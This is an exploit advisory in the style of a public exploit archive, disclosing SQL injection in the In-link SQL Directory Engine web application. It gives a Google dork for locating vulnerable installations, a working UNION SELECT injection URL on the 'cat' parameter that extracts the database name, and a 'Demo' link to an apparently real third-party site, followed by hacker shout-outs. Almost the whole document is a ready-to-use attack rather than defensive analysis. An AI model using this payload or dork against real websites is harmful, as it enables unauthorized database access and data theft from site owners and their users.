# Exploit Title: In-link SQL Directory Engine (ALL VERSIONS) SQL INJECTION Vulnerabilities # Google Dork: intext:In-link SQL Directory # Date: 08/09/2011 # Author: http://www.in-portal.com/ # Software Link: http://www.in-portal.com/modules/directory-management.html # Version: ALL Versions # Tested on: Windows 7 , Ubuntu 11 # CVE : # Exploit Discovered : SubhashDasyam # Website : http://www.subhashdasyam.com http://localhost/index.php?t=sub_pages&cat=-1+Union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 Demo:http://www.directorysoccer.com/index.php?t=sub_pages&cat=73438 Greetz to ALL INDIAN HACKERS and ALL HACKERS. Security is ILLUSION Greetz to Mr52,Jackh4x0r,Smith,Zone-Hacker,Dalsim,Exidous,HH,Aditya Modha,Jinen